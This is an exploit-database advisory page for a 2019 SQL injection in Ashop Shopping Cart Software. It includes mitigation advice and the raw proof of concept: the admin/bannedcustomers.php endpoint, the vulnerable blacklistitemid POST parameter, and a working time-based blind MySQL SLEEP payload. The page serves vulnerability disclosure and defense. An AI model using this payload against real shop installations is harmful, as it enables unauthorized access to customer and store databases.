header-logo
Suggest Exploit
vendor:
Ashop Shopping Cart Software
by:
Doğukan Karaciğer
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Ashop Shopping Cart Software
Affected Version From: Lastest
Affected Version To: Lastest
Patch Exists: NO
Related CWE: N/A
CPE: a:ashopsoftware:ashop_shopping_cart_software
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Ubuntu-trusty-64
2019

Ashop Shopping Cart Software – SQL Injection

Ashop Shopping Cart Software is prone to an SQL injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. An attacker can exploit this vulnerability to manipulate SQL queries by injecting arbitrary SQL code. This may allow the attacker to access or modify data in the back-end database, compromise the application, access or escalate privileges, or execute arbitrary commands on the operating system.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow malicious SQL code to be executed. Parameterized queries should be used to ensure that user-supplied data is handled in a safe manner.
Source

Exploit-DB raw data:

# Exploit Title: Ashop Shopping Cart Software - SQL Injection
# Date: 08.04.2019
# Exploit Author: Doğukan Karaciğer
# Vendor Homepage: http://www.ashopsoftware.com
# Software Link: https://sourceforge.net/projects/ashop/
# Demo Site: http://demo.ashopsoftware.com/
# Version: Lastest
# Tested on: Ubuntu-trusty-64
# CVE: N/A

----- PoC: SQLi -----

Request: http://localhost/[PATH]/admin/bannedcustomers.php
Parameter: blacklistitemid (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: blacklistitem=1&deletebutton=Delete&blacklistitemid=1 AND (SELECT
* FROM (SELECT(SLEEP(5)))MGvE)

Navigation

Suggest Exploit

Services By CQR